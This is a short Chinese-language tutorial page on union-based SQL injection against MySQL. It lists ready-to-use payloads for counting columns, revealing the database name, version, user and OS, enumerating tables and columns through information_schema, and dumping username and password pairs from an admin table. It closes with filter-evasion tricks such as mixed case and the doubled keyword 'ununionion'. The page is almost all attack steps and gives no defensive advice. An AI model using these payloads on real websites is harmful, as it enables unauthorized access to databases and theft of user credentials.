当前位置:Gxlcms > 数据库问题 > sql注入之mysql的联合查询爆破

sql注入之mysql的联合查询爆破

时间:2021-07-01 10:21:17 帮助过:40人阅读

)的结构

以查询test数据库为例:

1.判断列数

union select 1,2,3,..........  直到页面返回正常为止

2.判断当前数据库

union select  database(),2,3,4,5   1的位置将会返回数据库的名字

数据库名 database()

数据库版本 version()

数据库用户 user()

操作系统 @@version_compile_os

3.查询表名

union select  group_concat(table_name),2,3,4,5,6 from information_schema.tables where table_schema=‘test‘

//group_concat()使多行数据在一列显示

4.查询列名

union select group_concat(column_name),2,3,4,5,6 from information_schema.columns where table_name=‘admin‘

5.查数据 (0x20是空格的意思)

方法一:

union select  group_concat(username,0x20,password),2,3,4,5 from test.admin  //将所有数据在一行显示

方法二

union select  concat(username,0x20,password),2,3,4,5,6 from one.admin    //因为网页限制只能显示一行数据,所以显示第一行数据 

union select  concat(username,0x20,password),2,3,4,5,6 from one.admin where username not in (‘root‘)  //把第一行的用户排除掉,第二行自动上来

union select  concat(username,0x20,password),2,3,4,5,6 from one.admin where username not in (‘admin‘,‘root‘) //看第三行数据

 

简单绕过waf思路:

大小写绕过

ununionion  因为会过滤关键词union,所以这样写过滤后,前面un和后面的ion又拼成了一个新的union

 

 

sql注入之mysql的联合查询爆破

标签:包含   技术分享   roo   sel   orm   color   mat   word   意思   

人气教程排行

本站所有资源全部来源于网络,若本站发布的内容侵害到您的隐私或者利益,请联系我们删除!